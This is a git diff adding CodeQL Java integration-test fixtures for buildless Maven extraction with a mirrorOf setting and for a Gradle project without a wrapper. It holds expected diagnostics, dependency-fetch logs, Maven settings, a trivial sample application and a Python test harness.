+https://repo.maven.apache.org/maven2/io/github/scrollsyou/example-spring-boot-starter/1.0.0/example-spring-boot-starter-1.0.0.jar +https://repo.maven.apache.org/maven2/io/streamnative/com/example/maven-central-template/server/3.0.0/server-3.0.0.jar +https://repo.maven.apache.org/maven2/no/nav/security/token-validation-ktor-demo/3.1.0/token-validation-ktor-demo-3.1.0.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-fileupload/0.5.10/minijax-example-fileupload-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-inject/0.5.10/minijax-example-inject-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-json/0.5.10/minijax-example-json-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-mustache/0.5.10/minijax-example-mustache-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-petclinic/0.5.10/minijax-example-petclinic-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-security/0.5.10/minijax-example-security-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-ssl/0.5.10/minijax-example-ssl-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-todo-backend/0.5.10/minijax-example-todo-backend-0.5.10.jar +https://repo.maven.apache.org/maven2/org/minijax/minijax-example-websocket/0.5.10/minijax-example-websocket-0.5.10.jar +https://repo.maven.apache.org/maven2/org/scalamock/scalamock-examples_2.10/3.6.0/scalamock-examples_2.10-3.6.0.jar +https://repo.maven.apache.org/maven2/org/somda/sdc/glue-examples/4.0.0/glue-examples-4.0.0.jar +https://repo.maven.apache.org/maven2/us/fatehi/schemacrawler-examplecode/16.20.2/schemacrawler-examplecode-16.20.2.jar +https://repo1.maven.org/maven2/junit/junit/4.11/junit-4.11.jar +https://repo1.maven.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/diagnostics.expected b/java/ql/integration-tests/java/buildless-maven-mirrorof/diagnostics.expected new file mode 100644 index 000000000000..f3c89bb842a0 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/diagnostics.expected @@ -0,0 +1,70 @@ +{ + "markdownMessage": "Java analysis used build tool Maven to pick a JDK version and/or to recommend external dependencies.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/using-build-tool-advice", + "name": "Java analysis used build tool Maven to pick a JDK version and/or to recommend external dependencies" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis used the system default JDK.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/jdk-system-default", + "name": "Java analysis used the system default JDK" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis with build-mode 'none' completed.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/complete", + "name": "Java analysis with build-mode 'none' completed" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java was extracted with build-mode set to 'none'. This means that all Java source in the working directory will be scanned, with build tools such as Maven and Gradle only contributing information about external dependencies.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/mode-active", + "name": "Java was extracted with build-mode set to 'none'" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} +{ + "markdownMessage": "Reading the dependency graph from build files provided 2 classpath entries", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/depgraph-provided-by-maven", + "name": "Java analysis extracted precise dependency graph information from tool Maven" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/maven-fetches.expected b/java/ql/integration-tests/java/buildless-maven-mirrorof/maven-fetches.expected new file mode 100644 index 000000000000..de38626f4d84 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/maven-fetches.expected @@ -0,0 +1,77 @@ +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/core/jackson-annotations/2.14.1/jackson-annotations-2.14.1.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/core/jackson-annotations/2.14.1/jackson-annotations-2.14.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/core/jackson-core/2.14.1/jackson-core-2.14.1.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/core/jackson-core/2.14.1/jackson-core-2.14.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/core/jackson-databind/2.14.1/jackson-databind-2.14.1.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/core/jackson-databind/2.14.1/jackson-databind-2.14.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/jackson-base/2.14.1/jackson-base-2.14.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/jackson-bom/2.14.1/jackson-bom-2.14.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/jackson/jackson-parent/2.14/jackson-parent-2.14.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/fasterxml/oss-parent/48/oss-parent-48.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/github/ferstl/depgraph-maven-plugin/4.0.3-CodeQL/depgraph-maven-plugin-4.0.3-CodeQL.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/github/ferstl/depgraph-maven-plugin/4.0.3-CodeQL/depgraph-maven-plugin-4.0.3-CodeQL.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/errorprone/error_prone_annotations/2.36.0/error_prone_annotations-2.36.0.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/errorprone/error_prone_annotations/2.36.0/error_prone_annotations-2.36.0.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/errorprone/error_prone_parent/2.36.0/error_prone_parent-2.36.0.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/failureaccess/1.0.2/failureaccess-1.0.2.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/failureaccess/1.0.2/failureaccess-1.0.2.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/guava-parent/26.0-android/guava-parent-26.0-android.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/guava-parent/33.4.0-jre/guava-parent-33.4.0-jre.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/guava/33.4.0-jre/guava-33.4.0-jre.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/guava/33.4.0-jre/guava-33.4.0-jre.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/j2objc/j2objc-annotations/3.0.0/j2objc-annotations-3.0.0.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/com/google/j2objc/j2objc-annotations/3.0.0/j2objc-annotations-3.0.0.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/javax/annotation/javax.annotation-api/1.2/javax.annotation-api-1.2.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/javax/annotation/javax.annotation-api/1.2/javax.annotation-api-1.2.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/net/java/jvnet-parent/3/jvnet-parent-3.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/apache/19/apache-19.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/apache/25/apache-25.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/apache/27/apache-27.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/commons/commons-parent/47/commons-parent-47.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-artifact/3.8.6/maven-artifact-3.8.6.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-artifact/3.8.6/maven-artifact-3.8.6.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-model/3.8.6/maven-model-3.8.6.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-model/3.8.6/maven-model-3.8.6.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-parent/35/maven-parent-35.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-parent/37/maven-parent-37.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-plugin-api/3.8.6/maven-plugin-api-3.8.6.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven-plugin-api/3.8.6/maven-plugin-api-3.8.6.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/maven/3.8.6/maven-3.8.6.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/apache/maven/shared/maven-shared-components/37/maven-shared-components-37.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/checkerframework/checker-qual/3.43.0/checker-qual-3.43.0.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/checkerframework/checker-qual/3.43.0/checker-qual-3.43.0.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-utils/3.3.1/plexus-utils-3.3.1.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus-utils/3.3.1/plexus-utils-3.3.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus/4.0/plexus-4.0.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/codehaus/plexus/plexus/5.1/plexus-5.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.5/org.eclipse.sisu.inject-0.3.5.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.5/org.eclipse.sisu.inject-0.3.5.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.5/org.eclipse.sisu.plexus-0.3.5.jar +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.5/org.eclipse.sisu.plexus-0.3.5.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/eclipse/sisu/sisu-inject/0.3.5/sisu-inject-0.3.5.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/eclipse/sisu/sisu-plexus/0.3.5/sisu-plexus-0.3.5.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/junit/junit-bom/5.9.1/junit-bom-5.9.1.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/sonatype/forge/forge-parent/10/forge-parent-10.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/sonatype/oss/oss-parent/7/oss-parent-7.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/sonatype/oss/oss-parent/9/oss-parent-9.pom +Downloaded from codeql-depgraph-plugin-repo: file://[dist-root]/java/tools/ferstl-depgraph-dependencies/org/sonatype/spice/spice-parent/17/spice-parent-17.pom +Downloaded from mirror-force-central: https://repo1.maven.org/maven2/junit/junit/4.11/junit-4.11.pom +Downloaded from mirror-force-central: https://repo1.maven.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.pom +Downloaded from mirror-force-central: https://repo1.maven.org/maven2/org/hamcrest/hamcrest-parent/1.3/hamcrest-parent-1.3.pom diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/pom.xml b/java/ql/integration-tests/java/buildless-maven-mirrorof/pom.xml new file mode 100644 index 000000000000..ec4aaf128c18 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/pom.xml @@ -0,0 +1,114 @@ + + + + 4.0.0 + + com.example + maven-sample + 1.0-SNAPSHOT + + maven-sample + + http://www.example.com + + + UTF-8 + 1.7 + 1.7 + + + + + junit + junit + 4.11 + test + + + + + + + exec-maven-plugin + org.codehaus.mojo + 1.1.1 + + + check-maven-version + package + + java + + + + + com.example.App + + + + com.diffplug.spotless + spotless-maven-plugin + 2.19.1 + + + + check + + compile + + + + + + /* FAIL ME */ + + + + + + + + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-jar-plugin + 3.0.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + maven-site-plugin + 3.7.1 + + + maven-project-info-reports-plugin + 3.0.0 + + + + + \ No newline at end of file diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/settings-xml.expected b/java/ql/integration-tests/java/buildless-maven-mirrorof/settings-xml.expected new file mode 100644 index 000000000000..6a01b100b30e --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/settings-xml.expected @@ -0,0 +1,35 @@ + + + + + + + + mirror-force-central + + Mirror Repository + + https://repo1.maven.org/maven2 + + *,!codeql-depgraph-plugin-repo + + + + + + + + codeql-depgraph-plugin-repo + + + codeql-depgraph-plugin-repo + CodeQL Dependency Graph Plugin Repository + file://[dist-root]/java/tools/ferstl-depgraph-dependencies/ + + + + + + codeql-depgraph-plugin-repo + + diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/settings.xml b/java/ql/integration-tests/java/buildless-maven-mirrorof/settings.xml new file mode 100644 index 000000000000..8c4268224d40 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/settings.xml @@ -0,0 +1,10 @@ + + + + mirror-force-central + Mirror Repository + https://repo1.maven.org/maven2 + * + + + diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/source_archive.expected b/java/ql/integration-tests/java/buildless-maven-mirrorof/source_archive.expected new file mode 100644 index 000000000000..ac35d94be39e --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/source_archive.expected @@ -0,0 +1,8 @@ +pom.xml +settings.xml +src/main/java/com/example/App.java +src/main/resources/my-app.properties +src/main/resources/page.xml +src/main/resources/struts.xml +src/test/java/com/example/AppTest.java +test-db/working/settings.xml diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/java/com/example/App.java b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/java/com/example/App.java new file mode 100644 index 000000000000..c9eec918587c --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/java/com/example/App.java @@ -0,0 +1,30 @@ +package com.example; + +import java.util.regex.Pattern; +import java.nio.file.Path; +import java.nio.file.Paths; + +/** + * Hello world! + * + */ +public class App +{ + public static void main( String[] args ) + { + System.out.println( "Hello World!" ); + String expectedVersion = System.getenv("EXPECT_MAVEN"); + Path mavenHome = Paths.get(System.getProperty("maven.home")).normalize(); + String observedVersion = mavenHome.getFileName().toString(); + if (expectedVersion != null && !expectedVersion.equals(observedVersion)) { + System.err.println("Wrong maven version, expected '" + expectedVersion + "' but got '" + observedVersion + "'" + mavenHome); + System.exit(1); + } + String commandMatcher = System.getenv("EXPECT_COMMAND_REGEX"); + String command = System.getProperty("sun.java.command"); + if (commandMatcher != null && !Pattern.matches(commandMatcher, command)) { + System.err.println("Wrong command line, '" + command + "' does not match '" + commandMatcher + "'"); + System.exit(1); + } + } +} diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/my-app.properties b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/my-app.properties new file mode 100644 index 000000000000..e566b49a29a8 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/my-app.properties @@ -0,0 +1 @@ +version=1.0 diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/page.xml b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/page.xml new file mode 100644 index 000000000000..2bab459cb031 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/page.xml @@ -0,0 +1,8 @@ + + +A sample + + +

    Hello world!

    + + diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/struts.xml b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/struts.xml new file mode 100644 index 000000000000..73fc0c6b9cb6 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/main/resources/struts.xml @@ -0,0 +1,4 @@ + + +This is a sample file + diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/src/test/java/com/example/AppTest.java b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/test/java/com/example/AppTest.java new file mode 100644 index 000000000000..22a94ca6f01c --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/src/test/java/com/example/AppTest.java @@ -0,0 +1,20 @@ +package com.example; + +import static org.junit.Assert.assertTrue; + +import org.junit.Test; + +/** + * Unit test for simple App. + */ +public class AppTest +{ + /** + * Rigorous Test :-) + */ + @Test + public void shouldAnswerWithTrue() + { + assertTrue( true ); + } +} diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/test.py b/java/ql/integration-tests/java/buildless-maven-mirrorof/test.py new file mode 100644 index 000000000000..9cae7b675539 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/test.py @@ -0,0 +1,10 @@ +import os +import os.path + +def test(codeql, java): + codeql.database.create(build_mode = "none", + _env={ + "_JAVA_OPTIONS": "-Duser.home=" + os.path.join(os.getcwd(), "empty-home"), + "LGTM_INDEX_MAVEN_SETTINGS_FILE": os.path.join(os.path.dirname(os.path.realpath(__file__)), "settings.xml") + } + ) diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/.gitattributes b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/.gitattributes new file mode 100644 index 000000000000..00a51aff5e5a --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/.gitattributes @@ -0,0 +1,6 @@ +# +# https://help.github.com/articles/dealing-with-line-endings/ +# +# These are explicitly windows files and should use crlf +*.bat text eol=crlf + diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/.gitignore b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/.gitignore new file mode 100644 index 000000000000..1b6985c0094c --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/.gitignore @@ -0,0 +1,5 @@ +# Ignore Gradle project-specific cache directory +.gradle + +# Ignore Gradle build output directory +build diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/build.gradle b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/build.gradle new file mode 100644 index 000000000000..071a12b7691c --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/build.gradle @@ -0,0 +1,30 @@ +/* + * This build file was auto generated by running the Gradle 'init' task + * by 'arthur' at '28/11/20 22:29' with Gradle 3.0 + * + * This generated file contains a sample Java project to get you started. + * For more details take a look at the Java Quickstart chapter in the Gradle + * user guide available at https://docs.gradle.org/3.0/userguide/tutorial_java_projects.html + */ + +// Apply the java plugin to add support for Java +apply plugin: 'java' + +// In this section you declare where to find the dependencies of your project +repositories { + // Use 'jcenter' for resolving your dependencies. + // You can declare any Maven/Ivy/file repository here. + jcenter() +} + +// In this section you declare the dependencies for your production and test code +dependencies { + // The production code uses the SLF4J logging API at compile time + compile 'org.slf4j:slf4j-api:1.7.21' + + // Declare the dependency for your favourite test framework you want to use in your tests. + // TestNG is also supported by the Gradle Test task. Just change the + // testCompile dependency to testCompile 'org.testng:testng:6.8.1' and add + // 'test.useTestNG()' to your build script. + testCompile 'junit:junit:4.12' +} diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/diagnostics.expected b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/diagnostics.expected new file mode 100644 index 000000000000..8e5fb7fc737e --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/diagnostics.expected @@ -0,0 +1,98 @@ +{ + "markdownMessage": "Build tool(s) should have been able to provide a recommended classpath but the attempt failed. Extraction will continue, but external dependencies will be inferred from the Java package names used. Consider troubleshooting the build tool error or using a build mode other than 'none'.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/classpath-from-tool-failed", + "name": "Failed to extract dependency information from build tool tool Gradle" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} +{ + "markdownMessage": "Built a Gradle project without the [Gradle wrapper](https://docs.gradle.org/current/userguide/gradle_wrapper.html). This may use an incompatible version of Gradle.", + "severity": "warning", + "source": { + "extractorName": "java", + "id": "java/autobuilder/guessed-gradle-version", + "name": "Required Gradle version not specified" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis used build tool Gradle to pick a JDK version and/or to recommend external dependencies.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/using-build-tool-advice", + "name": "Java analysis used build tool Gradle to pick a JDK version and/or to recommend external dependencies" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis used the system default JDK.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/jdk-system-default", + "name": "Java analysis used the system default JDK" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis with build-mode 'none' completed.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/complete", + "name": "Java analysis with build-mode 'none' completed" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java was extracted with build-mode set to 'none'. This means that all Java source in the working directory will be scanned, with build tools such as Maven and Gradle only contributing information about external dependencies.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/mode-active", + "name": "Java was extracted with build-mode set to 'none'" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} +{ + "markdownMessage": "Running the Gradle plugin `org.gradle:github-dependency-graph-gradle-plugin` failed. This means precise dependency information will be unavailable, and so dependencies will be guessed based on Java package names. Consider investigating why this plugin fails to run.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/github-dependency-graph-gradle-plugin-failed", + "name": "Java analysis failed to extract a dependency graph from Gradle" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/settings.gradle b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/settings.gradle new file mode 100644 index 000000000000..233410459f60 --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/settings.gradle @@ -0,0 +1,19 @@ +/* + * This settings file was auto generated by the Gradle buildInit task + * by 'arthur' at '28/11/20 22:29' with Gradle 3.0 + * + * The settings file is used to specify which projects to include in your build. + * In a single project build this file can be empty or even removed. + * + * Detailed information about configuring a multi-project build in Gradle can be found + * in the user guide at https://docs.gradle.org/3.0/userguide/multi_project_builds.html + */ + +/* +// To declare projects as part of a multi-project build use the 'include' method +include 'shared' +include 